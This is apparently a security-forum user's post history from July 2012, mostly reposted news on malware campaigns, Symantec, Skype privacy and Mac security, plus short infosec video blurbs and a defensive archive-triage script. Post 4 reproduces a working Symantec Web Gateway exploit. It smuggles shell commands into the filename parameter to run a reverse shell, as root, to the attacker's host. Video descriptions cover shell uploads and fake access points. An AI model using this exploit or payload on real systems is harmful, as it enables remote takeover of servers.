Wubi

Everything posted by Wubi

  1. NYC Traffic Ticket spam is really Blackhole malware attack | Naked Security by Graham Cluley on July 25, 2012 Don't be too quick to believe that the New York State police are charging you with a traffic offence - that email you just opened in your inbox could actually be an attempt to infect your computer. The team at SophosLabs have been intercepting a malicious spam campaign today which tries to trick the recipient into believing that they were caught speeding. Here's what a typical email used in the attack looks like: Of course, if you have your head on straight you might ask yourself how the New York police could possibly have your email address (or at least how they would have connected it to your car). Or you might realise that the message is clearly spam as you weren't anywhere near New York on the day in question. But plenty of people won't have their head on straight, and - in their fluster - might click on the link without thinking. That's what the cybercriminals are banking on. Malware authors have used a very similar disguise in the past, tricking users into opening a dangerous attachment. On this occasion, however, there is no attachment. Instead, a link takes users to a website playing host to the Blackhole exploit kit - within seconds visiting computers can be infected via Adobe Flash and PDF exploits, detected by Sophos products as Troj/SWFExp-AI and Troj/PDFEx-GD. We've certainly seen lots of attacks involving the Blackhole exploit kit lately, including rejected wire transfer notifications and fake Facebook photo tag notifications. Keep your anti-virus software up-to-date, your operating system and applications patched, and - essentially - your wits about you. Hat-tip: Thanks to SophosLabs researcher Przemek Miozga for his assistance with this article. Source: NYC Traffic Ticket spam is really Blackhole malware attack | Naked Security
  2. In any case, it's an important lesson that many people should at least listen to and draw conclusions from. It's probably old, and the subject has probably been covered before. But quality never expires. It has no expiry date. Worth watching. At least worth watching.
  3. Take a look. It's worth it. There's something to learn. Honestly, I was truly impressed.
  4. Symantec Web Gateway 5.0.3.18 pbcontrol.php ROOT RCE Exploit
     EDB-ID: 20088 | CVE: 2012-2953 | OSVDB-ID: N/A | Author: muts | Published: 2012-07-24

```python
#!/usr/bin/python
import urllib
import sys
'''
print "[*] ##############################################################"
print "[*] Symantec Web Gateway 5.0.3.18 pbcontrol.php ROOT RCE Exploit"
print "[*] Offensive Security - http://www.offensive-security.com"
print "[*] ##############################################################\n"
# 06 Jun 2012: Vulnerability reported to CERT
# 08 Jun 2012: Response received from CERT with disclosure date set to 20 Jul 2012
# 26 Jun 2012: Email received from Symantec for additional information
# 26 Jun 2012: Additional proofs of concept sent to Symantec
# 06 Jul 2012: Update received from Symantec with intent to fix
# 20 Jul 2012: Symantec patch released: http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120720_00
# 23 Jul 2012: Public Disclosure
'''
if (len(sys.argv) != 4):
    print "[*] Usage: symantec-web-gateway-0day.py <RHOST> <LHOST> <LPORT>"
    exit(0)
rhost = str(sys.argv[1])
lhost = sys.argv[2]
lport = sys.argv[3]
# URL-encoded shell commands that reach the OS through the unsanitised filename parameter
payload= '''echo%20'%23!%2Fbin%2Fbash'%20%3E%20%2Ftmp%2FnetworkScript%3B%20echo%20'bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F'''+lhost+'''%2F'''+lport+'''%200%3E%261'%20%3E%3E%20%2Ftmp%2FnetworkScript%3Bchmod%20755%20%2Ftmp%2FnetworkScript%3B%20sudo%20%2Ftmp%2FnetworkScript'''
url = 'https://%s/spywall/pbcontrol.php?filename=hola";%s;"&stage=0' % (rhost,payload)
urllib.urlopen(url)
```
  5. Symantec names Bennett CEO; Q1 solid, outlook light | ZDNet Summary: Former Intuit chief Steve Bennett takes over as CEO of Symantec. Can the security vendor juice growth and fend off critics? By Larry Dignan for Between the Lines | July 25, 2012 -- 14:19 GMT (07:19 PDT) Steve Bennett, Chairman of Symantec, is in as CEO of the security software company. Enrique Salem is out after Symantec's board determined that the company just wasn't getting the performance it needed. In a statement, Symantec said that there was no one particular reason for Salem's departure. Bennett noted that "it was the board's judgment that it was in the best interests of Symantec to make a change in the CEO." Bennett also noted that Symantec's assets are strong yet underperforming. Bennett added that the company would "build upon the significant assets in place to help Symantec accelerate value creation for all of its stakeholders." Shares of Symantec gained nearly 15 percent after the announcement on hopes for better quarterly performance. Symantec's earnings results have been hit or miss relative to Wall Street estimates. In addition, Symantec's storage unit and security division rarely seem to be in sync in terms of financial performance. Stifel Nicolaus analyst Todd Weller said in a research note: Indeed, Bennett has a good track record. Bennett joined Symantec's board in 2010 and became chairman a year later. He had been CEO of Intuit from 2000 to 2007 and was an exec at General Electric. Barclays analyst Raimo Lenschow said Symantec could have been a good target for activist investors, which have targeted BMC and CA. These activists prod companies to make better use of their cash and deliver more value to investors. Symantec didn't offer a dividend, but had plenty of cash. The move to name Bennett CEO indicates Symantec is ready to shake things out without outside prodding. 
Returns on Symantec shares lagged the S&P 500 year to date and trailed the stock performance of most enterprise software peers. Separately, Symantec reported fiscal first quarter earnings of $172 million, or 24 cents a share, down from $191 million a year ago. Revenue for the first quarter was $1.67 billion, up 1 percent from a year ago. Non-GAAP earnings per share were 43 cents in the first quarter. Wall Street was looking for 38 cents a share on revenue of $1.65 billion. Overall, Symantec's units delivered flattish to single digit growth rates. The consumer business fell 1 percent from a year ago, security and compliance was up 7 percent and storage and server management fell 2 percent. As for the second quarter outlook, Symantec projected non-GAAP earnings between 35 cents a share and 39 cents a share. Symantec also said that second quarter revenue will be between $1.63 billion and $1.66 billion. Wall Street was looking for earnings of 40 cents a share on revenue of $1.69 billion. Bennett's challenge will be stringing together a series of better-than-expected quarters. Source: Symantec names Bennett CEO; Q1 solid, outlook light | ZDNet
  6. No, Microsoft and Skype are not playing Big Brother | ZDNet Summary: If all you have is tinfoil, everything looks like a conspiracy. But it's hard to work up even a mild case of paranoia about your personal communications if you actually read Skype's Privacy Policy from start to finish. By Ed Bott for The Ed Bott Report | July 25, 2012 -- 12:55 GMT (05:55 PDT) My colleague Steven J. Vaughan-Nichols wants you to be afraid of Skype. Very afraid. “Big Brother Microsoft,” he says, “listens in to your Skype IMs.” Oh my goodness, this is simply awful. Or at least one would think so, unless you read the parts of the Skype Privacy Policy that Mr. Vaughan-Nichols conveniently omitted from his inflammatory report. I’ve read that document carefully. You can too. When you do, you'll see that there's not much to fear. The ginned-up controversy involves two sections. First is the preamble to section 1: Skype may gather and use information about you, including (but not limited to) information in the following categories… That’s followed by a long list of data types that you must, by definition, share with a communication service of which you are a member. Things like your name and e-mail address, which you enter into your profile. Your list of contacts. The payment information you’ve stored with Skype (your credit card number, for example) so that you can make international calls at a few cents per minute. And then there’s the item in section (n), which is conveniently bold-faced in Steven’s post so that you know exactly what he wants you to be scared about: (n) Content of instant messaging communications (please see section 12) Wait, what? Someone at Microsoft is reading your instant messages in Skype? Well, no. Let’s ignore the fact that the only reason most ordinary people use Skype IMs is to coordinate the audio and video portion of the call with the person on the other end. 
My Skype IM history mostly contains messages like “Hey, plug in your webcam so we can talk, OK?” But it’s a reasonable question to ask. Why on earth would Skype want to “gather and use … the content of instant messaging communications” by its subscribers? That question is answered, directly, in Section 2, which immediately follows the list in section 1. It is headlined, in bold: HOW DOES SKYPE USE THIS INFORMATION AND FOR WHAT PURPOSE? Our primary purpose in collecting information is to provide you with a safe, smooth, efficient, and customized experience. Skype collects and uses, or has third party service providers acting on Skype’s behalf collecting and using, personal data relating to you, as permitted or necessary to… That in turn is followed by a list of 14 reasons, none of which are controversial. In fact, the very first item on the list answers the question thoroughly. Skype gathers and uses that information to “provide internet communication, video sharing and other products in particular to convey the communications and videos you and others make by means of the Skype software and/or the Skype products.” Right. When you type words into a communication service, those words have to be "gathered and used" as they are passed from node to node along the network of computers that make up Skype’s network. It’s the same reason that you have to give an online storage provider the right to copy and use files you store in the cloud—because they need that right in order to provide you with the service you signed up for. In Steven’s post, he highlights a small part of section 12: Skype currently keeps your instant messages “for a maximum of 30 days unless otherwise permitted or required by law. Voicemail messages are currently stored for a maximum of 60 days unless otherwise permitted or required by law.” So let’s be logical here. Why on earth would a service want to retain this data for 30 days? 
Perhaps it would make more sense if we read the section in its entirety instead of selectively editing it. Maybe that will answer the question: Retention of Instant Messages (Skype internet communications software application only) Your instant messaging (IM) communications-content may be stored by Skype (a) to convey and synchronise your messages and (b) to enable you to retrieve the messages and history where possible. IM messages are currently stored for a maximum of 30 days unless otherwise permitted or required by law. Voicemail messages are currently stored for a maximum of 60 days unless otherwise permitted or required by law. Skype will at all times take appropriate technical and security measures to protect your information. By using this product, you consent to the storage of your IM communications as described above. [emphasis added] Oh. So the service needs to store my messages in order to synchronize my messages and allow me to retrieve them on different devices. So if I have a conversation with you on my desktop PC and then go on the road with my notebook or iPad or mobile phone, I can sign in to my Skype account and we can pick up where we left off? Even if that last conversation was two or three weeks ago? That doesn’t seem so nefarious. Skype also discloses that it will store voicemail messages. Well, of course they will. That’s how voicemail works. This whole controversy started last week when a writer at Slate tried to spin gold out of the stuff you find on the floor of a barn. No, not straw. The other stuff: [W]hen I repeatedly questioned the company on Wednesday whether it could currently facilitate wiretap requests, a clear answer was not forthcoming. Citing “company policy,” Skype PR man Chaim Haas wouldn’t confirm or deny… Hello? Spokespersons for big companies aren't normally allowed to comment on sensitive legal issues. 
If I had a nickel for every time someone at Microsoft or Apple or Google or Facebook gave me a boilerplate official response and declined further comment, we could have one very lavish party. Look, if you are concerned about the privacy or security of any kind of communications over the Internet, you should think twice about using a widely available commercial service designed for consumers. That’s true of email, any voice-over-IP service, and any form of instant messaging. (Microsoft does offer a business-class secure messaging service called Lync.) If you are worried that any of those communications might be of interest to a law enforcement agency, then you should invest in a secure, encrypted channel. You should not use Skype or Facebook chat or Google Voice. That's Privacy 101. On the other hand, if you want to chat with your grandkids who live across the country, or you want to catch up with an old friend who moved to Thailand, or you want to have a face-to-face chat with your spouse from your hotel room after a long day of business travel, you should feel completely comfortable using Skype. You certainly shouldn't be afraid. Meanwhile, in the interest of telling the rest of the story, I’ve asked Facebook, Google, and Microsoft for an update on their specific privacy policies for their chat services and will do a follow-up post after I hear back. Source: No, Microsoft and Skype are not playing Big Brother | ZDNet
  7. Taxi drivers told to stop snooping on passengers | ZDNet Summary: Southampton cab owners can no longer be forced to make video and audio recordings of everything their customers do and say, the ICO has said By Tom Espiner | July 25, 2012 -- 12:35 GMT (05:35 PDT) Cab drivers in Southampton must stop videoing and recording their passengers' conversations, the UK's privacy watchdog has ordered. Since 2009, taxis in Southampton have had to constantly record all journeys using CCTV and audio equipment, a mandatory requirement by local authorities. On Wednesday, the Information Commissioner's Office (ICO) published an enforcement notice telling Southampton City Council to put a halt to the practice by 1 November. Southampton City Council "went too far" in having taxis record all passenger conversations on video and audio, the ICO has said. "By requiring taxi operators to record all conversations and images while the vehicles are in use, Southampton City Council have gone too far," information commissioner Christopher Graham said in a statement. "We recognise the council's desire to ensure the safety of passengers and drivers, but this has to be balanced against the degree of privacy that most people would reasonably expect in the back of a taxi cab," he added. The council's policy was a breach of the Data Protection Act, the ICO said, noting that recording all conversations was out of proportion to the "very low" amount of trouble seen by taxi drivers. It is also important to stop the recording because many drivers use their vehicles outside work, according to Graham. Southampton covers an area of 51.81 square kilometres, with a population of about 239,700. 
While the ICO could not give figures on how many people had been recorded in Southampton taxis over the three-year period, it did say a sizeable proportion could have been affected. In 2009 Southampton City Council said the CCTV would be rolled out to 800 cabs. A city spokesman told ZDNet that not all of those 800 taxis had been fitted with CCTV. "We hope this action sends a clear message to local authorities that they must properly consider all the legal obligations on them before requiring the installation of CCTV or similar equipment and that audio recording should be very much the exception, rather than the rule," Graham said. Southampton City Council has not said whether it will appeal or comply with the notice. The ICO recently stopped Oxford City Council from implementing a similar taxi surveillance policy, it said on Wednesday. Source: Taxi drivers told to stop snooping on passengers | ZDNet
  8. Apple releases OS X 10.8 Mountain Lion: What you need to know | ZDNet Summary: OS X 10.8 Mountain Lion was released Wednesday after a year in development. Out with a slew of new features, here's what you need to know, as well as a roundup of ZDNet and CNET's coverage. By Zack Whittaker for Between the Lines | July 25, 2012 -- 11:44 GMT (04:44 PDT) Cue the fanfare. Apple released OS X 10.8 Mountain Lion at long last, after more than a year in development. First announced in February, third-party application developers have spent months preparing for the release. Despite the release being dubbed a minor upgrade to the older 10.7 "Lion," Apple has included a number of new features to revitalize Mac sales ahead of Microsoft's Windows 8 launch later this year. With greater iCloud integration, Messages, and social sharing, along with a brand new Notification Center, Apple continues the "iOS-ification" of its desktop operating system to bring it closer in line with its mobile cousins. Mountain Lion is now available in the Mac App Store for $19.99 in the U.S., £13.99 in the U.K., and €15.99 in Europe. Most modern Macs, MacBooks, and Mac minis will be able to download the operating system, and those who bought new Apple hardware in the past month will receive a free upgrade. Here's a roundup of what you need to know, from ZDNet and sister-site CNET: Apple's Mountain Lion: Another step toward iOS, Mac feature unification Larry Dignan: It's not immediately clear what Apple's Mac OS speedy cadence and feature unification with iOS will mean for business users. Source: Apple releases OS X 10.8 Mountain Lion: What you need to know | ZDNet
  9. Jail for man who tricked women into taking hacked webcams into shower | Naked Security by Graham Cluley on July 25, 2012 For a long time perverts and cyberstalkers have been getting kicks out of secretly snooping on female victims via webcams. There's clearly a type of man (sorry for being sexist, but all the examples I have found online have male culprits) who gets a thrill out of secretly spying on young women in their bedrooms. In the most harrowing cases young women are actually blackmailed into posing naked by hackers threatening to distribute compromising photos. Pretty sick stuff. Which brings us to 21-year-old Trevor Harwell, of Fullerton, California, who has just been jailed after he installed spyware onto victims' laptops, and displayed a bogus error message to increase the chances of capturing nude pictures and movies. "You should fix your internal sensor soon. If unsure what to do, try putting your laptop near hot steam for several minutes to clean the sensor." As we reported last year, Harwell's scheme successfully tricked a number of young women into taking their laptops into their bathroom while taking a steamy shower. Thousands of secretly taken still images, videos and cellphone videos were found on Harwell's computer. He had plenty of opportunity to install the spying software onto his prospective victims' computers, because he worked part time as a "friendly" computer repairman. Of course, there was nothing to prevent a snooped-upon victim being under-age. It's true for people of any age, but young people's PCs must be properly protected with the latest anti-virus software, security patches and firewalls. It is also essential that young people are taught how to behave safely online, to avoid being exploited by sick-minded hackers. 
Find out more about how to protect children from online threats at www.getsafeonline.org Find out about the Virtual Global Taskforce - a group of police forces working around the world to fight online child abuse Harwell was sentenced to one year in the Anaheim City Jail, five years of formal probation, and has been ordered to complete a Sex Offender Treatment program. You can make up your own joke about how he better be careful in the jail's showers. Source: Jail for man who tricked women into taking hacked webcams into shower | Naked Security
  10. July 25, 2012, by Black. X-Ray scans your Android device to determine whether there are vulnerabilities that remain unpatched by your carrier. The X-Ray app presents you with a list of vulnerabilities that it is able to identify and allows you to check for the presence of each vulnerability on your device. Features of X-Ray: Safely scan for vulnerabilities on your Android phone or tablet; Assess your mobile security risk; Keep your carrier honest. X-Ray was developed by the security experts at Duo Security. We hope that X-Ray will empower users with knowledge of vulnerabilities on their devices and allow them to take action to improve their security. We encourage users to contact their carriers and ask for their devices to be patched. X-Ray has detailed knowledge about a class of vulnerabilities known as “privilege escalation” vulnerabilities. Such vulnerabilities can be exploited by a malicious application to gain root privileges on a device and perform actions that would normally be restricted by the Android operating system. A number of such vulnerabilities have been discovered in the core Android platform, affecting nearly all Android devices. Even more have been discovered in manufacturer-specific extensions that may affect a smaller subset of Android users. Unfortunately, many of these privilege escalation vulnerabilities remain unpatched on large populations of Android devices despite being several years old. If there are vulnerabilities present on your device that are not patched, a malicious application may exploit the vulnerabilities to gain full, unrestricted control over your Android device. While the apps you install from the Google Play store are normally restricted by the permissions you grant them and constrained by the Android sandbox, these vulnerabilities allow a malicious application to escalate privileges to a root/superuser privilege and perform any action they desire without you knowing. 
The good thing about X-Ray is that instead of trying to detect all the possible malicious apps in the universe, it takes a different approach and seeks out the known vulnerabilities in the underlying mobile platform itself. X-Ray doesn’t care whether the apps on your device are good or bad; it only cares whether there are vulnerabilities present that bad apps often exploit to gain full control of your device. Download X-Ray: X-Ray Source: X-Ray a Tool to scan Android for unpatched vulnerabilities — PenTestIT
  11. Description: Java Drive-by Download is a method in which an attacker crafts a webpage with Java drive-by code, and when someone visits the page, an executable, which may be a RAT, worm or virus, is downloaded and executed on his system without his permission and knowledge. Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying. Original Source:
  12. Description: In this video you will learn how to upload a shell on a website; what you do with the website after uploading is up to you. This video will give you an idea of how the shell works and what you can do with that trick. Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying. Original Source:
  13. Description: In this video you will learn how to create a fake access point using a script called FAKEAP_PWN; you can download that script from here: g0tmi1k: [script] fakeAP_pwn (v0.3). You will find lots of information about this script on that site, which I have posted. Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying. Original Source:
  14. Description: This video is all about how you can discover all the access points on a street, for fun or profit and information, and how to bind all the information to Google Earth so you can view it graphically. In this video he shows how to set up all these things, like Bluetooth and the wireless card, and how to use the Kismet tool for capturing traffic from the street. Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying. Original Source:
  15. Description: In this video you will learn Bash scripting for multiple commands. Sometimes we want to use the same command again and again, and that is just a waste of time, but how do you automate those things with one script? This is a good video for making your own bash script, with lots of new tricks that you will learn by watching it. If you don't know what the Bash shell is, please read this Wikipedia link: Bash (Unix shell) - Wikipedia, the free encyclopedia Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying. Original Source:
  16. Sneaking security into Telstra, Macquarie Bank | ZDNet Summary: How do you implement security when company executives only see it as a cost? Perhaps it can be snuck into the business without anyone really knowing, just like malware. By Michael Lee | July 25, 2012 -- 07:22 GMT (00:22 PDT) Raising awareness of security means getting the top executives on-board, but with security often seen as a cost or impediment, some have had better success by slowly sneaking security into the business through other means. Speaking at the Security 2012 conference in Sydney today, Occams Razor director Nicholas Martin recollected how during his tenure at Telstra as its general manager of security strategy, and then as Macquarie Bank's head of corporate security, he had to use alternative methods to drill security through to the executive level of both companies for their own good. Martin's story with Telstra began with its CEO David Thodey, who at the time was in charge of the telco's largest division: enterprise and government. The division at the time was experiencing difficulties, not only on the commercial aspects, but also in how it complied with its regulatory responsibilities. "The strategy was, 'let's go to David Thodey', whose single biggest customer group was the government at the time, and talk to him about how we can work with him and his broader team, trying to coordinate and interface with government," Martin said. Martin essentially played the audit-compliance blackjack card, just as ING Direct recently did, promising that security could help make these problems go away. "We essentially pitched it to him. We could come in [and] help him coordinate across regulatory and commercial. We could also be involved in any major bids." These bids included Westfield's move to Telstra's datacentre. Martin would effectively use security as a means to provide the retail giant with assurances, as well as answer any questions related to the safety of data. 
However, Martin said that the process requires patience, stating that it took two years before he felt that Telstra had a security program in place that he was comfortable with. It also meant changing the organisation's security focus. Telstra had previously placed emphasis on anti-terrorism activities after the events of 11 September 2001, but the money that was being spent in this area wasn't actually making the organisation any safer. Instead, Telstra's security slowly transformed to focus on identity theft and fraud, as they were the real risks affecting the business, and ones that it could do something about. The younger Macquarie Bank, in contrast, was normally seen as being more agile due to its rapid growth. However, according to Martin, with its youth came a lack of experience in security incidents and issues, and this meant that it simply didn't have the appetite or see the need for a large, heavy security program. "For me to go to them and say, 'Let's implement a Telstra-style program' to the organisation wasn't going to work," Martin said, recalling that he needed to find a different strategy for the executives. "I found that the best strategy to try and get security in front of the senior team there and get their support was mainly around the executive protection program." Although Macquarie Bank's executives weren't in any immediate danger, Martin realised that their personal lives were often under scrutiny by shareholders and the media whenever a financial report was released. Martin enlisted the help of the head of Macquarie Capital at the time, Nicholas Moore, who went on to become Macquarie Group's CEO, and used the media's scrutiny to raise awareness about security. "I used that as a mechanism to talk to them about [the executive protection program] and that was my avenue into them. We ran reverse due diligence on all of the executive team just to show them what the members of the public could actually find out about them legitimately. 
Once we got their trust that we were supporting them, then we were able to then build whole other layers of security where we thought we needed it." Martin did admit, however, that even with this trust, it was up to the executives at the end of the day as to whether they wanted to follow his advice. He recalled the actions of one particular banker whose office window sat across from the Commonwealth Bank's building. "You could actually look out of the Commonwealth Bank, through his office window, and with a pair of binoculars you could pretty much read his computer screen. If you wanted to ... you [could use] directional microphones and all that [and] probably hear all the conversations," he said, recalling the conversation he had with the banker. The response he received was, "Why would anyone want to hear about the rubbish I talk about each day?" "Sometimes you've got to go with what they feel and believe, unless you can really articulate the threat and the risk they're facing." Source: Sneaking security into Telstra, Macquarie Bank | ZDNet
  17. Mac malware Crisis on Mountain Lion eve? | Naked Security by Paul Ducklin on July 25, 2012 SophosLabs recently received a intriguing Mac malware sample, variously known as Crisis and Morcut. We're still digging into the details of the malware itself, but the delivery mechanism is interesting. The malware package arrived in a file named AdobeFlashPlayer.jar. JAR stands for Java Archive. JAR files, which are structurally just ZIP files with a special name, are used as a standardised way of packaging and delivering Java software. This makes it easy to deliver a Java program along with all the programming libraries, configuration data, images and other supporting stuff it needs. nside the malicious AdobeFlashPlayer.jar is a .class file named WebEnhancer, and two unassuming-looking files named win and mac. Class files are to Java what EXE files are to Windows - they're the compiled software components which run inside the Java Virtual Machine (JVM). Unlike EXE files, however, they are inherently multi-platform. The same .class file will run on OS X and Windows, for example, with the JVM providing the platform-specific software layer. And cross-platform support is what the malware author is after here. The WebEnhancer program file has nothing to do with web browsing - instead, it simply works out whether you have Windows or OS X, and chooses between the win and mac files. WebEnhancer is implemented as an applet: a special sort of Java program that runs inside a Java-enabled browser. The author's inventiveness obviously ran out at this point: win is an installer for Windows malware (detected by Sophos as Mal/Swizzor-D), whilst mac is an installer for the Crisis, or Morcut, malware for OS X (detected by Sophos as OSX/Morcut-A). The good news is that the WebEnhancer applet causes a digital signature alert. 
This warns you that the applet is from an untrusted publisher, and reminds you that "this application will run with unrestricted access which may put your personal information at risk." Of course, the Morcut malware itself doesn't have to be delivered inside a JAR file - but the sample I looked at was packaged that way. We'll let you know what we find as we dig into the Morcut malware. A cursory examination suggests that it's going to be interesting (I was going to say "fun", but that sounds all wrong!) for the analyst who got the job. Morcut has kernel driver components to help it hide, a backdoor component which opens up your Mac to others on your network, a command-and-control component so it can accept remote instructions and adapt its behaviour, data stealing code, and more. So, watch this space for further details if you're interested in the guts of modern Mac malware, and don't forget:
• Cybercrooks now consider Mac users to be worthwhile victims.
• Malware can easily target multiple platforms. "WebEnhancers" often aren't.
• If you don't need Java, uninstall it. That leaves one less convenience for malware writers.
• Don't blindly ignore certificate warnings.
• Don't feel left out if you're a Linux user.
Oh, and if you don't yet have anti-malware on your Mac, why not try the free Sophos Anti-Virus for Mac Home Edition? (No registration, no password, no expiry. We don't even ask for an email address.) If you're planning on picking up a brand new Mac when Mountain Lion drops later today, why not start off secure? Source: Mac malware Crisis on Mountain Lion eve? | Naked Security
  18. Windows malware found in iOS App Store. Say what?! | Naked Security by Joshua Long on July 25, 2012 It hasn't been a great week so far for Apple security. The discovery of new, low-distribution Mac malware known as Crisis or Morcut would be bad enough news, just before the launch of Mountain Lion. But, alas, there's another security issue: an iOS app in the App Store was found to contain malicious Windows executable files. The malware was initially found by a user of the Apple Support Communities discussion board who downloaded an app called "Instaquotes-Quotes Cards For Instagram" from iTunes, only to have his antivirus software tell him that it contained a worm. Initially thought to be a false positive, it turned out that there was in fact actual Windows malware embedded inside the app. The malware, detected by Sophos products as Mal/CoiDung-A, is identified as Worm.VB-900 by ClamAV and Worm:Win32/VB.CB by Microsoft. CNET reports that Apple removed the Instaquotes app from the iOS App Store on Tuesday within hours of the malware's discovery. According to a MacRumors report, the app had been in the App Store since 19 July and its price had temporarily dropped from $0.99 to free this past weekend. It is unknown how many users downloaded the app while it was available in the store. It's also not entirely clear whether the malware's inclusion inside the app was deliberate or not - but in all probability this was an accidental infection caused by an infected developer's computer. The good news is that the malware can't actually run on a Windows PC without first being extracted from the iOS application package, so it is unlikely to have caused any actual damage to any users' systems. Earlier this month, Apple made the mistake of approving another questionable iOS app. In that case, the app itself engaged in nefarious behavior and was thus deemed by some to be malware. 
That app, known as Find and Call, collected contact information from phones on which it was installed, sent this information in plain text over HTTP, and then sent SMS text message spam to the user's contacts, all without warning the user or asking for permission. There's a major difference between Instaquotes and Find and Call, though. While Find and Call actually grabbed your data, the malware embedded in Instaquotes cannot cause any direct harm to Apple devices that run iOS. Nevertheless, this is twice in a single month that Apple's infamous app review process has neglected to stop bad things from getting inside the iOS "walled garden." Perhaps what's most disappointing about the discovery of Windows malware inside an iOS app is that Apple doesn't seem to have conducted a simple virus scan as part of its app vetting process. Just extracting all files from the package, and scanning them with anti-virus software, would have prevented the Windows malware from getting into the iOS App Store in the first place. As I discussed in detail last month, Apple could be doing a lot better job at vetting apps and improving the overall security of the iPhone, iPad, and App Store. Source: Windows malware found in iOS App Store. Say what?! | Naked Security
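The two stories above (the AdobeFlashPlayer.jar dropper carrying a WebEnhancer class plus `win` and `mac` payloads, and the Windows worm found inside an iOS app package) share one triage lesson: JAR and IPA files are both ZIP containers, so the "extract everything and look at what it really is" check Joshua Long asks for is mechanical. The script below is an added example written for this page, not code from Sophos or either article. It opens an archive, classifies every entry by its leading magic bytes rather than by its name, and reports entries whose real type does not belong in that kind of container. The archives it inspects are constructed in memory from harmless stand-in bytes; the container layouts, entry names and the "expected types" table are this example's assumptions.

```python
import io
import struct
import zipfile

# Magic numbers of the executable formats involved in the two stories.
PE_MAGIC = b"MZ"
ELF_MAGIC = b"\x7fELF"
MACHO_MAGICS = {
    b"\xfe\xed\xfa\xce", b"\xce\xfa\xed\xfe",   # 32-bit Mach-O, big/little endian
    b"\xfe\xed\xfa\xcf", b"\xcf\xfa\xed\xfe",   # 64-bit Mach-O
}
CAFEBABE = b"\xca\xfe\xba\xbe"                  # Java class file AND fat Mach-O

# What a given container legitimately carries (assumption for this example).
EXPECTED = {
    "jar": {"java-class", "other"},
    "ipa": {"macho", "macho-fat", "other"},
}


def identify(head: bytes) -> str:
    """Classify a file by its leading bytes, never by its name or extension."""
    if head.startswith(PE_MAGIC):
        return "pe"
    if head.startswith(ELF_MAGIC):
        return "elf"
    if head[:4] in MACHO_MAGICS:
        return "macho"
    if head.startswith(CAFEBABE) and len(head) >= 8:
        # Java .class files and Mach-O universal ("fat") binaries share CAFEBABE.
        # A class file continues with minor+major version (major >= 45 since
        # JDK 1.0.2); a fat header continues with nfat_arch, a small count.
        word = struct.unpack(">I", head[4:8])[0]
        return "java-class" if word >= 45 else "macho-fat"
    return "other"


def triage_archive(blob: bytes):
    """Return (entry name, detected type) for every file in a ZIP-based package."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            with zf.open(info) as fh:
                head = fh.read(8)
            findings.append((info.filename, identify(head)))
    return findings


def unexpected_entries(blob: bytes, container: str):
    """Entries whose real type does not belong in this kind of container."""
    allowed = EXPECTED[container]
    return [(name, kind) for name, kind in triage_archive(blob) if kind not in allowed]


def _build(entries: dict) -> bytes:
    """Build a ZIP in memory from {name: bytes} (fixture helper for the samples)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


# Constructed stand-ins (harmless bytes, not real malware) mirroring the layouts
# described in the articles: a JAR with one class and two native payloads, and an
# IPA whose app bundle contains a stray PE file beside the expected Mach-O binary.
FAKE_JAR = _build({
    "META-INF/MANIFEST.MF": b"Manifest-Version: 1.0\n",
    "WebEnhancer.class": CAFEBABE + b"\x00\x00\x00\x32" + b"\x00" * 16,  # major 50 = Java 6
    "win": b"MZ\x90\x00" + b"\x00" * 60,
    "mac": CAFEBABE + b"\x00\x00\x00\x02" + b"\x00" * 16,                # fat Mach-O, 2 slices
})
FAKE_IPA = _build({
    "Payload/Quotes.app/Info.plist": b"<plist/>",
    "Payload/Quotes.app/Quotes": b"\xce\xfa\xed\xfe" + b"\x00" * 20,    # 32-bit ARM Mach-O
    "Payload/Quotes.app/Resources/cards.exe": b"MZ" + b"\x00" * 62,
})

if __name__ == "__main__":
    for label, blob, kind in (("JAR", FAKE_JAR, "jar"), ("IPA", FAKE_IPA, "ipa")):
        print(label)
        for name, detected in triage_archive(blob):
            print("  %-40s %s" % (name, detected))
        print("  unexpected:", unexpected_entries(blob, kind))
```

Two caveats a practitioner should keep in mind: the CAFEBABE collision means a naive "first four bytes" check would call a fat Mach-O a Java class (the version-versus-count test above separates them), and magic-based triage only sees payloads stored in the clear, so an encrypted or XOR-wrapped `win`/`mac` blob would come back as "other" and still deserve a second look if it sits beside a tiny loader class.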
  19. Cuckoo Sandbox version 0.4! — PenTestIT July 25, 2012 By Mayuresh Our first post regarding the Cuckoo Sandbox can be found here. A few hours ago, an update, Cuckoo Sandbox version 0.4, was released! This release can be considered a historical milestone in the project's history and the best release to have been produced so far: it is a complete rewrite of every single component from scratch with modularity, scalability and flexibility in mind. "Cuckoo Sandbox is a malware analysis system. Its goal is to provide you a way to automatically analyze files and collect comprehensive results describing and outlining what such files do while executed inside an isolated environment. It's mostly used to analyze Windows executables, DLL files, PDF documents, Office documents, PHP scripts, Python scripts, Internet URLs and almost anything else you can imagine. But it can do much more!" Cuckoo Sandbox 0.4 official change log:
• Modules for performing custom post-analysis processing of the results and generating reports: being able to customize the interpretation of the results and the generation of reports in any format you want, you can easily integrate Cuckoo Sandbox in any existing framework or environment you already have in place.
• Default support for KVM and the ability to create new, or modify existing, Python modules that will instruct Cuckoo Sandbox on how to interact with your virtualization solution of choice.
• A signatures engine that you can use to identify and isolate any pattern or event of interest: contextualize the analysis results, quickly identify known malware or look for particularly interesting events for you or your company.
• Improved scripting capabilities, further customizing the sandbox to your analysis needs. You can now customize Cuckoo's analysis process to the best extent by simply writing Python modules that define how Cuckoo Sandbox should interact with the malware and the analysis environment.
• Last but not least, the Cuckoo Sandbox analysis core was completely re-engineered. This will significantly improve the quality of the analysis, giving much more detailed and explanatory information about the malware you're analyzing.
